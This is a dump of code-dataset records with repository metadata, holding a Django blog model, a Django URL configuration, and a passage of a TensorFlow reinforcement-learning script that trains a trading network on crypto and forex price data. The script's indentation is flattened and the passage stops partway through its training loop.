Dataset schema (one column per field, one row per source file):

| field | type | range / classes |
|---|---|---|
| blob_id | string | length 40 |
| directory_id | string | length 40 |
| path | string | length 2-616 |
| content_id | string | length 40 |
| detected_licenses | list | length 0-69 |
| license_type | string | 2 classes |
| repo_name | string | length 5-118 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| branch_name | string | length 4-63 |
| visit_date | timestamp[us] | |
| revision_date | timestamp[us] | |
| committer_date | timestamp[us] | |
| github_id | int64 | 2.91k-686M, nullable (⌀) |
| star_events_count | int64 | 0-209k |
| fork_events_count | int64 | 0-110k |
| gha_license_id | string | 23 classes |
| gha_event_created_at | timestamp[us] | |
| gha_created_at | timestamp[us] | |
| gha_language | string | 213 classes |
| src_encoding | string | 30 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 2-10.3M |
| extension | string | 246 classes |
| content | string | length 2-10.3M |
| authors | list | length 1 |
| author_id | string | length 0-212 |

Each record below lists these fields as `field: value` pairs; the file itself follows `content:` verbatim.
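If this dump comes from a Hugging Face dataset with this schema (an assumption, since the source is not named here), records like the ones below could be streamed rather than downloaded in full. The dataset path is a placeholder:

```python
# Hypothetical loader; "<org>/<dataset>" is a placeholder, as this dump
# does not name its source dataset.
from datasets import load_dataset

ds = load_dataset("<org>/<dataset>", split="train", streaming=True)
for row in ds.take(1):
    # field names match the schema table above
    print(row["repo_name"], row["path"], row["length_bytes"])
```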
---
blob_id: c6ad23573189e89a657dbedf5813bc172c22b7cd
directory_id: 24b08fe0f9aaf1ae36d592b4e9610bccc0c275e4
path: /blog/models.py
content_id: 4b7421680e7e743425fc6807bd86f59f015be5e0
detected_licenses: []
license_type: no_license
repo_name: snehmankad/Corey-Schafer-Django-Blog
snapshot_id: 4108f56365982e4588985e374640ae01b5a94980
revision_id: f33530d57b6cf1e8dc6eca8b821e51fb16b1c811
branch_name: refs/heads/master
visit_date: 2022-12-15T19:25:13.608175
revision_date: 2020-09-06T20:45:57
committer_date: 2020-09-06T20:45:57
github_id: 293,356,916
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 547
extension: py
content:
from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
from django.urls import reverse

# Create your models here.
class Post(models.Model):
    title = models.CharField(max_length=100)
    content = models.TextField()
    date_posted = models.DateTimeField(default=timezone.now)
    author = models.ForeignKey(User, on_delete=models.CASCADE)

    def __str__(self):
        return self.title

    def get_absolute_url(self):
        return reverse('post-detail', kwargs={'pk': self.pk})
authors: ["52824859+snehmankad@users.noreply.github.com"]
author_id: 52824859+snehmankad@users.noreply.github.com
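`get_absolute_url` above resolves the named route `post-detail`, which is defined elsewhere in the project. A minimal sketch of the URLconf it assumes; the view name follows the Corey Schafer tutorial this repo tracks and is an assumption, not part of this file:

```python
# Hypothetical blog/urls.py matching reverse('post-detail', kwargs={'pk': ...}).
from django.urls import path
from .views import PostDetailView  # assumed class-based DetailView

urlpatterns = [
    # <int:pk> captures the primary key that get_absolute_url passes in
    path('post/<int:pk>/', PostDetailView.as_view(), name='post-detail'),
]
```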
---
blob_id: b3885f80a7017c005cf61766beb7ddaa0369d604
directory_id: bba0159d2991ed8e8450cd85d902b89cf6b486f3
path: /config/urls.py
content_id: c38338a8ed25b8b7a7b3c255370c3e5dfea56754
detected_licenses: ["MIT"]
license_type: permissive
repo_name: dzhfrv/django-base-app
snapshot_id: 548562f1cb4109f68f4a7e6c104691abe1a6762c
revision_id: 9dcc27a2e75e7aa3c6d31b468f089e0b70f52df9
branch_name: refs/heads/main
visit_date: 2023-01-02T13:15:11.612938
revision_date: 2020-10-29T18:14:11
committer_date: 2020-10-29T18:14:11
github_id: 308,393,941
star_events_count: 1
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 212
extension: py
content:
from django.contrib import admin
from django.urls import path, include

v1 = [
    path('v1/', include('apps.user.urls')),
]

urlpatterns = [
    path('admin/', admin.site.urls),
    path('api/', include(v1)),
]
authors: ["solomonickey@gmail.com"]
author_id: solomonickey@gmail.com
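Note on the nested include above: because the `v1` pattern list is itself included under `'api/'`, any route defined in `apps.user.urls` is served at a path of the form `/api/v1/...`, which is how Django builds versioned API prefixes from plain `include` calls.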
---
blob_id: 0eba2e2b51b28f73626d4731ff56290996caf4eb
directory_id: 62494569ad62bae44c13499dc222ffa0301541cb
path: /Final Code/3. Train Network.py
content_id: 6b08d436b95f8e9ff96d5cd3d7ee455c3551e972
detected_licenses: []
license_type: no_license
repo_name: rendorHaevyn/Project_WinLife
snapshot_id: b1f5c71a338b366cfe094e7aef296bc982e52a2f
revision_id: ef409e7e56c57a17ccb69f2183ddca42cae0039a
branch_name: refs/heads/master
visit_date: 2021-07-09T15:20:03.979369
revision_date: 2018-12-09T22:08:28
committer_date: 2018-12-09T22:08:28
github_id: 132,147,130
star_events_count: 0
fork_events_count: 4
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 51,940
extension: py
content:
from __future__ import print_function
import numpy as np
import random
import pandas as pd
import sklearn
import sklearn.decomposition
import sklearn.ensemble
import sklearn.preprocessing
import sklearn.cluster
from sklearn import *
import math
import gc
import os
import sys
import itertools
import threading
from matplotlib import pyplot as plt
import matplotlib.colors
import tensorflow as tf
import re
import time
import pickle
import Constants
import gym
import copy
import gc
import pandas as pd
import matplotlib.pyplot as plt
import seaborn
from sklearn.cluster import KMeans
import numpy as np
from scipy.spatial.distance import cdist, pdist
# Utility Function to return True / False regex matching
def pattern_match(patt, string):
return re.findall(patt, string) != []
# Utility Function to save objects in memory to a file
def save_memory(obj, path):
return pickle.dump(obj, open(path, "wb"))
# Utility Function to load objects from the harddisk
def load_memory(path):
return pickle.load(open(path, "rb"))
gc.collect()
try:
os.mkdir(Constants.SAVE_PATH)
except FileExistsError as e1:
pass
except OSError as e2:
print('Failed to create directory {} - Incorrect syntax?'.format(Constants.SAVE_PATH))
except:
print('Error occurred - {}.'.format(sys.exc_info()[0]))
############################ START MARKET CLASS ############################
class Market(gym.Env):
"""Trading Market environment"""
def randomIndex(self):
return random.randint(0, len(self.TRAIN)-self.DISCOUNT_STEPS - 10)
def __init__(self, dataFile = None, COINS_IN = [], COINS_OUT = [], short = False):
gc.collect()
self.data = dataFile
self.data = self.data.dropna(axis=0, how='any').reset_index(drop=True)
cut_off_date = int(time.mktime(time.strptime('01/04/2018', "%d/%m/%Y"))) * 1000
self.data = self.data[self.data.date > cut_off_date].reset_index(drop=True)
self.data['reward_USD'] = 0
if COINS_OUT == []:
COINS_OUT = ['USD'] + [x.replace('close_','') for x in self.data.columns if "close_" in x]
self.COINS = COINS_OUT
print("{} rows & {} columns".format(len(self.data), len(self.data.columns)))
#--------------------------------------------------------------------------------------
# Manual Options
#--------------------------------------------------------------------------------------
self.COMMISSION = 1e-10 # Commision % as a decimal to use in loss function
self.NORMALIZE = True # Normalize Data
self.ALLOW_SHORTS = True # Allow Shorts or not
self.GAMMA = 0.5 # The discount factor
self.DISCOUNT_STEPS = 5 # Number of periods to look ahead for discounting
self.TRAIN_PERCENT = 0.75 # Percentage of data to use as training
self.MULTS = 1 # How many future rewards to include in output
#--------------------------------------------------------------------------------------
# List of coins data to use as input variables. Set to [] to use all coins
#--------------------------------------------------------------------------------------
self.N_COINS = len(self.COINS)#( len(self.COINS) * 2 - 1 ) if self.ALLOW_SHORTS else len(self.COINS)
#--------------------------------------------------------------------------------------
# Create a list of X column names to use for modelling
#--------------------------------------------------------------------------------------
the_coins = []
if COINS_IN == []:
for c in self.data.columns:
if "reward_" in c and c != "reward_USD" and not c.endswith("_S") and c.replace("reward_","") not in the_coins:
the_coins.append(c.replace("reward_",""))
else:
for c in self.data.columns:
if "reward_" in c and c != "reward_USD" and not c.endswith("_S") and c.replace("reward_","") not in the_coins:
the_coin = c.replace("reward_","")
if the_coin in COINS_IN:
the_coins.append(the_coin)
self.COINS_IN = the_coins
in_cols = []
for c in self.data.columns:
if "DAY_OF_WEEK" in c or "HOUR_OF_DAY" in c:
in_cols.append(c)
continue
for a in sorted(set(the_coins)):
if "_"+a in c:
in_cols.append(c)
COLS_X = []
for x in in_cols:
if "reward_" in x or "train_" in x:
continue
COLS_X.append(x)
#for c in self.data.columns:
# if "limit" in c:
# self.data[c.replace("limit","reward")] = self.data[c]
#--------------------------------------------------------------------------------------
# Create a list of Y column names to use for modelling
#--------------------------------------------------------------------------------------
COLS_Y = [] if "USD" not in self.COINS and "USDT" not in self.COINS else ["reward_USD"]
for c in self.data.columns:
added = False
if 'reward' in c and (c != 'reward_USD' and c not in COLS_Y):
if COINS_OUT == []:
COLS_Y += [c]
added = True
else:
for a in sorted(set(self.COINS)):
if c == "reward_" + a and c not in COLS_Y:
COLS_Y += [c]
print("added reward:", c)
added = True
if added:
#self.data[c+"_S"] = self.data[c].apply(lambda x : math.log10(2-10**x))
self.data[c+"_S"] = self.data[c].apply(lambda x : -x)
if self.ALLOW_SHORTS:
COLS_Y += ["{}_S".format(y) for y in COLS_Y if y != "reward_USD"]
current_ys = copy.deepcopy(COLS_Y)
for ahead in range(1, self.MULTS):
for y in current_ys:
c = y + "_" + str(ahead + 1)
self.data[c] = self.data[y].shift(-ahead)
COLS_Y.append(c)
self.N_CRYPTO = len([1 for y in COLS_Y if y != "reward_USD" and not y.endswith("_S")])
PORT_W = [w.replace("reward_", "MARGIN_") for w in COLS_Y]
for p in PORT_W:
self.data[p] = 0
self.data["MARGIN_USD"] = 1
if self.COMMISSION != 0:
COLS_X += PORT_W
# Hard-code in spread
for x in COLS_Y:
if x in ("train_USD", "reward_USD"):
continue
self.data[x] = self.data[x].apply(lambda x : x + math.log10(1-0.0/4000))
COLS_Y_TRAIN = [x.replace("reward_","train_") for x in COLS_Y]
print(COLS_Y)
print(COLS_Y_TRAIN)
for y_pos in range(len(COLS_Y_TRAIN)):
train_col = COLS_Y_TRAIN[y_pos]
orig_col = COLS_Y[y_pos]
stmt = "self.data['{}'] = self.data['{}']".format(train_col, orig_col)
for ahead in range(1,self.DISCOUNT_STEPS+1):
stmt += "+(self.GAMMA**{}) * self.data['{}'].shift({})".format(ahead, orig_col, -ahead)
#for ahead in range(1,self.DISCOUNT_STEPS+1):
# stmt += "+((0.25*self.GAMMA)**{}) * self.data['{}'].shift({})".format(ahead, orig_col, ahead)
#stmt += "+ math.log10(1 - 0.0001)"
print("Calculating Discount Rewards...", end="")
exec(stmt)
self.COLS_Y_TRAIN = COLS_Y_TRAIN
self.data = self.data.dropna(axis=0, how='any').reset_index(drop=True)
#for c in COLS_Y:
# if "USD" in c:
# continue
# self.data[c] = self.data[c] + math.log10(1 - self.COMMISSION)
#self.data = self.data.dropna(axis=0, how='any').reset_index(drop=True)
#--------------------------------------------------------------------------------------
# Split Train/Test
#--------------------------------------------------------------------------------------
train_idx = int( self.TRAIN_PERCENT * len(self.data) )
#--------------------------------------------------------------------------------------
# Normalizing the X columns. Scale using training data only
#--------------------------------------------------------------------------------------
self.SCALE_DICT = {}
if self.NORMALIZE:
'''print("Normalizing Data...", end="")
scaler = sklearn.preprocessing.StandardScaler()
print("Fitting Scaler: {}".format(len(COLS_X)))
scaler.fit( self.data[:train_idx][COLS_X] )
print("Using Scaler: {}".format(len(COLS_X)))
self.data[COLS_X] = scaler.transform(self.data[COLS_X])
self.SAVE_SCALER = scaler
self.SAVE_SCALER_COLS = COLS_X'''
#def scale_col(dat, x, mu, sd):
# dat[x] = dat[x].apply(lambda x : (x-mu)/sd)
# print("Scaled {}".format(x))
#norm_threads = []
descriptions = self.data[:train_idx].describe()
for i, x in enumerate(COLS_X):
if "MARGIN" in x or 'date' in x or "close_" in x or "open_" in x or "low_" in x or "high_" in x:
continue
mu, sd = descriptions[x]['mean'], descriptions[x]['std']
print("Normalizing {} - {} / {} {:.5f}, {:.5f}".format(x, (i+1), len(COLS_X), mu, sd))
self.SCALE_DICT[x] = (mu, sd)
self.data[x] = self.data[x].apply(lambda x : (x-mu)/sd)
#thr = threading.Thread(target=scale_col, args=(self.data, x, mu, sd))
#norm_threads.append(thr)
#norm_threads[-1].start()
#for thr in norm_threads:
# thr.join()
print("Done")
self.TRAIN = self.data[:train_idx].reset_index(drop=True)
#self.TEST = self.TRAIN
self.TEST = self.data[train_idx:].reset_index(drop=True)
fee_rate = 0.002/100
self.TRAIN_HOLD = copy.deepcopy(self.TRAIN)
self.TRAIN_HOLD[PORT_W] = 0 # Set all holdings to 0
self.TRAIN_HOLD[PORT_W[0]] = 1 # Set first holding to 1
self.TRAIN_HOLD[COLS_Y_TRAIN] += 2 * math.log10(1 - fee_rate) # Add transaction cost to all rewards
self.TRAIN_HOLD[COLS_Y_TRAIN[0]] -= 2 * math.log10(1 - fee_rate) # Remove it from the one we're holding
for i, y in enumerate(COLS_Y):
if i == 0:
continue
new = copy.deepcopy(self.TRAIN)
new[PORT_W] = 0 # Set all holdings to 0
new[PORT_W[i]] = 1 # Set first holding to 1
new[COLS_Y_TRAIN] += 2 * math.log10(1 - fee_rate) # Add transaction cost to all rewards
new[COLS_Y_TRAIN[i]] -= 2 * math.log10(1 - fee_rate) # Remove it from the one we're holding
if COLS_Y[0] == "reward_USD":
new[COLS_Y_TRAIN[0]] -= 1 * math.log10(1 - fee_rate) # Remove it from the one we're holding
self.TRAIN_HOLD = self.TRAIN_HOLD.append(new)
self.TRAIN_HOLD.reset_index(inplace=True)
self.COLS_X = COLS_X
self.COLS_Y = COLS_Y
self.N_IN = len(COLS_X)
self.N_OUT = len(COLS_Y)
self.holdings = {}
for i, c in enumerate(sorted(self.COLS_Y)):
self.holdings[c.replace("reward_","")] = 0
self.holdings['USD'] = 1
self.position = self.randomIndex()
self.ACTIONS = [x.replace("reward_","") for x in self.COLS_Y]
self.PORT_W = PORT_W
self.N_CRYPTO_IN = len(self.COINS_IN)
print("CRYPTO_IN:" + str(self.COINS_IN))
self.PREV_W_COLS = PORT_W
gc.collect()
print("Market Data Loaded")
def save(self):
items = [ (self.SCALE_DICT, "{}\\SCALE_DICT.save".format(Constants.SAVE_PATH)),
(self.PRICE_TENSOR_COLS, "{}\\PRICE_TENSOR_COLS.save".format(Constants.SAVE_PATH)),
(self.PRICE_LAGS, "{}\\PRICE_LAGS.save".format(Constants.SAVE_PATH))]
for i in items:
try:
save_memory(i[0], i[1])
except:
pass
def step(self, action):
rw = 0
self.COMM_REWARD = math.log10(1 - self.COMMISSION)
act_loc = M.ACTIONS.index(action)
if self.TRAIN.at[self.position, self.PORT_W[act_loc]] == 1:
rw = 0
elif action in ("USD", "USDT") or self.TRAIN.at[self.position, "MARGIN_USD"] == 1:#\
#(self.TRAIN.at[self.position, "MARGIN_USD"] == 1 and action not in ("USD", "USDT")):
rw = 1 * self.COMM_REWARD
else:
rw = 2 * self.COMM_REWARD
rw += self.TRAIN.at[self.position, "reward_{}".format(action)]
self.position += 1
for w in self.PORT_W:
self.TRAIN.set_value(self.position, w, 0)
self.TRAIN.set_value(self.position, self.PORT_W[act_loc], 1)
if np.isnan(rw):
print(self.position, action, self.holdings)
return rw
############################ END MARKET CLASS ############################
raw_data = pd.read_csv("Data/Crypto/5m/ALL_MOD.csv")
#raw_data = pd.read_csv("Data/Forex/15m/ALL_MOD.csv")
#M = Market(raw_data,
# COINS_IN = ['BTC', 'EOS', 'ETC', 'ETH', 'IOTA', 'LTC', 'XRP'],
# COINS_OUT = ['BTC', 'EOS', 'ETC', 'ETH', 'IOTA', 'LTC', 'XRP'])
fx_pairs_in = ['AUDCAD', 'AUDJPY', 'AUDNZD', 'AUDUSD', 'CADJPY', 'EURAUD', 'EURCAD', 'EURGBP',
'EURJPY', 'EURNZD', 'EURUSD', 'GBPAUD', 'GBPCAD', 'GBPJPY', 'GBPNZD', 'GBPUSD',
'NZDCAD', 'NZDJPY', 'NZDUSD', 'USDCAD', 'USDJPY', 'USDOLLAR']
fx_pairs_out = ['AUDCAD', 'AUDJPY', 'AUDNZD', 'AUDUSD', 'CADJPY', 'EURAUD', 'EURCAD', 'EURGBP',
'EURJPY', 'EURNZD', 'EURUSD', 'GBPAUD', 'GBPCAD', 'GBPJPY', 'GBPNZD', 'GBPUSD',
'NZDCAD', 'NZDJPY', 'NZDUSD', 'USDCAD', 'USDJPY']
fx_pairs = ['USD', 'AUDUSD', 'EURUSD', 'GBPJPY', 'AUDJPY', 'GBPUSD', 'USDJPY', 'EURAUD', 'EURJPY']
M = Market(raw_data,
COINS_IN = ["BMXBTCUSD", "BFXBTCUSDT", "BINBTCUSDT", "GDXBTCUSD", "BFXXRPUSDT", "BINETHUSDT"],
COINS_OUT = ["BMXBTCUSD"])
#M = Market(raw_data,
# COINS_IN = ["AUDJPY", "AUDUSD", "GBPJPY", "GBPUSD", "EURUSD", "NZDUSD", "EURCAD", "USDJPY"],
# COINS_OUT = ['USDJPY'])
X2 = []
for x in M.data.columns:
channel_rank = 1000
lag_rank = 1000
channel_rank = 0 if "L_CLOSE" in x else channel_rank
channel_rank = 1 if "L_LOW" in x else channel_rank
channel_rank = 2 if "L_HIGH" in x else channel_rank
channel_rank = 3 if "L_VOLUME" in x else channel_rank
channel_rank = 4 if "L_VOLPRICE" in x else channel_rank
channel_rank = 5 if "L2_CLOSE" in x else channel_rank
channel_rank = 6 if "L2_LOW" in x else channel_rank
channel_rank = 7 if "L2_HIGH" in x else channel_rank
channel_rank = 8 if "L3_CLOSE" in x else channel_rank
channel_rank = 9 if "L3_LOW" in x else channel_rank
channel_rank = 10 if "L3_HIGH" in x else channel_rank
channel_rank = 11 if "SMACLOSE1" in x else channel_rank
channel_rank = 12 if "SMACLOSE2" in x else channel_rank
channel_rank = 13 if "SMACLOSE3" in x else channel_rank
channel_rank = 14 if "SMACLOSE4" in x else channel_rank
channel_rank = 15 if "SMACLOSE5" in x else channel_rank
channel_rank = 16 if "SMALOW1" in x else channel_rank
channel_rank = 17 if "SMALOW2" in x else channel_rank
channel_rank = 18 if "SMALOW3" in x else channel_rank
channel_rank = 19 if "SMALOW4" in x else channel_rank
channel_rank = 20 if "SMALOW5" in x else channel_rank
channel_rank = 21 if "SMAHIGH1" in x else channel_rank
channel_rank = 22 if "SMAHIGH2" in x else channel_rank
channel_rank = 23 if "SMAHIGH3" in x else channel_rank
channel_rank = 24 if "SMAHIGH4" in x else channel_rank
channel_rank = 25 if "SMAHIGH5" in x else channel_rank
channel_rank = 26 if "RSI1" in x else channel_rank
channel_rank = 27 if "RSI2" in x else channel_rank
channel_rank = 28 if "RSI3" in x else channel_rank
channel_rank = 29 if "RSI4" in x else channel_rank
channel_rank = 30 if "RSI5" in x else channel_rank
#channel_rank = 29 if "SUPPORT1" in x else channel_rank
#channel_rank = 30 if "RESIST1" in x else channel_rank
channel_rank = 31 if "LINEAR1" in x else channel_rank
channel_rank = 32 if "LINEAR2" in x else channel_rank
channel_rank = 33 if "LINEAR3" in x else channel_rank
S_COINS = sorted(M.COINS_IN)
coin_rank = -1
for i, c in enumerate(S_COINS):
if x.endswith("_"+c):
coin_rank = i
break
try:
lag_rank = int("".join([ch for ch in x[x.index("_"):] if ch in '0123456789']))
lag_rank *= -1
except:
pass
if coin_rank < 0:
continue
X2.append( (coin_rank, lag_rank, channel_rank, x) )
X2.sort(key = lambda x : (x[0], x[1], x[2]))
PRICE_TENSOR = [(x[-1], x[-2], x[-3]) for x in X2 if 0 <= x[2] < 1000]
cols = list(M.data.columns)
PRICE_LAGS = len(set([x[2] for x in PRICE_TENSOR]))
PRICE_CHANNELS = len(set([x[1] for x in PRICE_TENSOR]))
PRICE_TENSOR_COLS = [x[0] for x in PRICE_TENSOR]
PRICE_TENSOR_IDX = [cols.index(x) for x in PRICE_TENSOR_COLS]
M.PRICE_LAGS = PRICE_LAGS
M.PRICE_TENSOR_COLS = PRICE_TENSOR_COLS
MU_SD_TABLE = M.TRAIN[PRICE_TENSOR_COLS].describe()
USE_SIGMOID = True
N_COINS = M.N_COINS
N_CRYPTO = M.N_CRYPTO_IN
N_IN = M.N_IN
N_OUT = M.N_OUT
TIMESTEP_DAYS = 86400000 / (M.data.date - M.data.date.shift(1)).describe()['50%']
with tf.device("/GPU:0"):
# PrevW
HOLD_W = tf.placeholder(tf.float32, [None, N_OUT])
HOLD_W = tf.reshape(HOLD_W, [-1, N_OUT])
# Actual Rewards
Y_ = tf.placeholder(tf.float32, [None, N_OUT])
Q_TARGET = tf.placeholder(tf.float32, [None, N_OUT])
Q_TARGET = tf.reshape(Q_TARGET, [-1, N_OUT])
keep_p1 = tf.placeholder(tf.float32, name = 'keep1')
keep_p2 = tf.placeholder(tf.float32, name = 'keep2')
keep_p3 = tf.placeholder(tf.float32, name = 'keep3')
#--------------------------------------------------------------------------------------
# Define Neural Network layers
#--------------------------------------------------------------------------------------
h_1 = 1
w_1 = 1
CH_OUT_1 = 20
FILTER1 = [h_1, w_1, PRICE_CHANNELS, CH_OUT_1] # Filter 1 x 3 x 3, Input has 4 channels
h_2 = 1
w_2 = PRICE_LAGS - w_1 + 1
CH_OUT_2 = 50
FILTER2 = [h_2, w_2, CH_OUT_1, CH_OUT_2]
# Final
h_f = N_CRYPTO
w_f = 1
CH_OUT_f = 100
FILTERf = [h_f, w_f, CH_OUT_2, CH_OUT_f]
SDEV = 1
BIAS_MULT = 0
initializer = tf.contrib.layers.xavier_initializer()
initializer_cnn = tf.contrib.layers.xavier_initializer_conv2d()
X_PRICE_TENSOR = tf.placeholder(tf.float32, [None, len(PRICE_TENSOR_COLS)])
X_PRICE_TENSOR_NN = tf.reshape(X_PRICE_TENSOR, [-1, N_CRYPTO, PRICE_LAGS, PRICE_CHANNELS])
#X_PRICE_TENSOR_NN_AVG = tf.nn.avg_pool(X_PRICE_TENSOR_NN, [1,1,3,1], [1,1,3,1], 'VALID')
X_SCALER = tf.Variable(tf.ones([N_CRYPTO, 1, PRICE_CHANNELS]))
X_SCALER2 = tf.Variable(tf.ones([1, PRICE_LAGS, PRICE_CHANNELS]))
X_PRICE_TENSOR_NN_AVG = X_PRICE_TENSOR_NN
#X_PRICE_TENSOR_NN_AVG = tf.round(4 * X_PRICE_TENSOR_NN) / 4
X_PRICE_TENSOR_NN_AVG = tf.multiply(X_PRICE_TENSOR_NN_AVG, X_SCALER)
X_PRICE_TENSOR_NN_AVG = tf.multiply(X_PRICE_TENSOR_NN_AVG, X_SCALER2)
LEAKY_ALPHA = 0.05
# LAYER 1
CW1 = tf.Variable(tf.random_normal(FILTER1, stddev = SDEV * (1/(h_1*w_1*PRICE_CHANNELS))**0.5 ))
CB1 = tf.Variable(tf.zeros([CH_OUT_1]))
CL1 = tf.nn.leaky_relu(tf.nn.conv2d(X_PRICE_TENSOR_NN_AVG, CW1, [1,1,1,1], padding="VALID") + CB1 * BIAS_MULT, LEAKY_ALPHA)
CL1 = tf.nn.dropout(CL1, keep_p1)
# LAYER 2
CW2 = tf.Variable(tf.random_normal(FILTER2, stddev = SDEV * (1/(h_2*w_2*CH_OUT_1))**0.5))
CB2 = tf.Variable(tf.zeros([CH_OUT_2]))
CL2 = tf.nn.leaky_relu(tf.nn.conv2d(CL1, CW2, [1,1,1,1], padding="VALID") + CB2 * BIAS_MULT, LEAKY_ALPHA)
CL2 = tf.nn.dropout(CL2, keep_p2)
CW4 = tf.Variable(tf.random_normal(FILTERf, stddev = SDEV * (1/(h_f*w_f*CH_OUT_f))**0.5))
CB4 = tf.Variable(tf.zeros([CH_OUT_f]))
CL4 = tf.nn.relu(tf.nn.conv2d(CL2, CW4, [1,1,1,1], padding="VALID") + CB4 * BIAS_MULT)
CL4 = tf.nn.dropout(CL4, keep_p3)
CL_flat = tf.reshape(CL4, (-1, CH_OUT_f * N_CRYPTO//h_f))
CL_flat = tf.concat( [CL_flat, HOLD_W], -1)
fc_w = tf.Variable( initializer([int(CL_flat.shape[-1]), 100]) )
fc_b = tf.Variable( initializer([100]) )
fc_w2 = tf.Variable( initializer([100, N_OUT]) )
fc_b2 = tf.Variable( initializer([N_OUT]) )
LOSS_L2 = tf.nn.l2_loss(fc_w)
Q_UNSCALED1 = tf.nn.relu(tf.matmul(CL_flat, fc_w) + fc_b * BIAS_MULT)
Q_UNSCALED1 = tf.nn.dropout(Q_UNSCALED1, keep_p3)
Q_UNSCALED = tf.matmul(Q_UNSCALED1, fc_w2) + fc_b2 * BIAS_MULT
Q_UNSCALED = tf.nn.dropout(Q_UNSCALED, keep_p3)
if USE_SIGMOID:
Q_PREDICT = tf.nn.sigmoid(Q_UNSCALED)
else:
#Q_PREDICT = Q_UNSCALED
Q_PREDICT = tf.nn.softmax(Q_UNSCALED, 1)
#--------------------------------------------------------------------------------------
# Define Loss Functions
#--------------------------------------------------------------------------------------
q_predict_mean, q_predict_var = tf.nn.moments(Q_PREDICT, axes=[1])
all_returns = tf.reduce_sum(Q_PREDICT * Q_TARGET, 1)
all_returns2 = tf.nn.relu( tf.reduce_sum(Q_PREDICT * Q_TARGET, 1) ) ** 0.8 - \
tf.nn.relu( -tf.reduce_sum(Q_PREDICT * Q_TARGET, 1) ) ** 0.8
loss_func = -tf.reduce_mean(all_returns)
r_mean, r_var = tf.nn.moments(all_returns, axes=[0])
sharpe_loss = -r_mean / (r_var**0.5)
winning_trades = tf.nn.relu(all_returns)
winning_trades_mean = tf.reduce_mean(winning_trades)
losing_trades = tf.nn.relu(-all_returns)
losing_trades_mean = tf.reduce_mean(losing_trades)
winning_trades2 = tf.nn.relu(all_returns2)
winning_trades_mean2 = tf.reduce_mean(winning_trades2)
losing_trades2 = tf.nn.relu(-all_returns2)
losing_trades_mean2 = tf.reduce_mean(losing_trades2)
#min_func = -tf.reduce_mean(tf.reduce_sum(Q_PREDICT * Q_TARGET, 1) ) * math.e**-r_stdev
opt_func = (winning_trades_mean2/losing_trades_mean2) * (-tf.reduce_mean(all_returns2) + 0.1 * tf.reduce_mean(losing_trades2))# - \
#opt_func = -tf.reduce_mean(winning_trades) / tf.reduce_mean(losing_trades)# - \
#1e-7 * tf.reduce_min(all_returns)
#opt_func = -tf.reduce_mean(tf.reduce_sum(Q_PREDICT * Q_TARGET, 1) ) * math.e**-r_var
#opt_func = -tf.reduce_sum(all_returns)# + 0.5*tf.reduce_sum(losing_trades)
#opt_func = tf.reduce_sum(tf.square(Q_PREDICT - Q_TARGET), 0)
opt_func = -tf.reduce_mean(all_returns2)
#loss_func = -tf.reduce_sum(Q_PREDICT * Q_TARGET) \
# - math.log10(1-M.COMMISSION)*tf.reduce_sum( tf.abs(tf.reduce_sum(Q_PREDICT[1:,:] - Q_PREDICT[:-1,:], 1) ) )
LR_START = 0.0005
# Optimizer
LEARNING_RATE = tf.Variable(LR_START, trainable=False)
optimizer = tf.train.AdamOptimizer(LEARNING_RATE)#(LEARNING_RATE)
train_step = optimizer.minimize(1e2 * opt_func)
#--------------------------------------------------------------------------------------
# Begin Tensorflow Session
#--------------------------------------------------------------------------------------
init = tf.global_variables_initializer()
config = tf.ConfigProto()
config.intra_op_parallelism_threads = 32
config.log_device_placement = True
sess = tf.Session(config=config)
sess.run(init)
# probability of picking a random action. This decays over time
epsilon = 0.1
all_rewards = [] # Holds all observed rewards. The rolling mean of rewards should improve as the network learns
all_Qs = [] # Holds all predicted Q values. Useful as a sanity check once the network is trained
all_losses = [] # Holds all the (Q_TARGET - Q_PREDICTED) values. The rolling mean of this should decrease
Q_TARGETS = []
Q_PREDS = []
PRICE_STATES = []
H_WEIGHTS = []
Q_CONVERGE = {} # Not used yet
projections = []
watch = Constants.Stopwatch()
train_losses, test_losses, transf_losses, opt_losses = [], [], [], []
gc.collect()
episode = 0
smallest_loss = 1e6
while episode < 1000000:
init_pos = episode % (len(M.TRAIN)-50)#
#init_pos = M.randomIndex()
M.position = init_pos
USD_STATE = None
USD_PRICE_STATE = None
Q_USD = 0
W_USD = 0
'''if episode == 100:
update_LR = tf.assign(LEARNING_RATE, 0.001)
sess.run(update_LR)'''
for w_index, starting_w in enumerate(M.PORT_W):
watch.start('update_W')
M.position = init_pos
for w in M.PORT_W:
M.TRAIN.set_value(M.position, w, 0)
M.TRAIN.set_value(M.position, starting_w, 1)
watch.end('update_W')
watch.start('set_state')
init_price_state = np.array(M.TRAIN.iloc[M.position, PRICE_TENSOR_IDX])
watch.end('set_state')
watch.start('Q_PREDICT')
Q1 = sess.run(Q_PREDICT, feed_dict = {
X_PRICE_TENSOR : np.reshape(init_price_state,(-1, len(PRICE_TENSOR_COLS)) ),
HOLD_W : np.array(M.TRAIN.ix[M.position, M.PORT_W]).reshape( (-1, N_OUT) ),
keep_p1 : 1, keep_p2 : 1, keep_p3 : 1} )
watch.end('Q_PREDICT')
if w_index == 0:
USD_PRICE_STATE = init_price_state
Q_USD = Q1
W_USD = np.array(M.TRAIN.ix[M.position, M.PORT_W]).reshape( (-1, N_OUT) )
targetQ = list(Q1[0])
for act_num, begin_act in enumerate(M.ACTIONS):
M.position = init_pos
for w in M.PORT_W:
M.TRAIN.set_value(M.position, w, 0)
M.TRAIN.set_value(M.position, starting_w, 1)
#print(M.TRAIN.loc[M.position, M.PORT_W])
watch.start("market_step")
#G = M.step(begin_act)
#Gpercent = 100*(10**G-1)
#G = math.log10(1+int(Gpercent*8)/800)
profit = M.TRAIN.at[M.position, M.COLS_Y_TRAIN[act_num]]
G = profit
M.position += 1
watch.end("market_step")
for t in range(0):#M.DISCOUNT_STEPS):
state = np.array(M.TRAIN.loc[M.position, M.COLS_X])
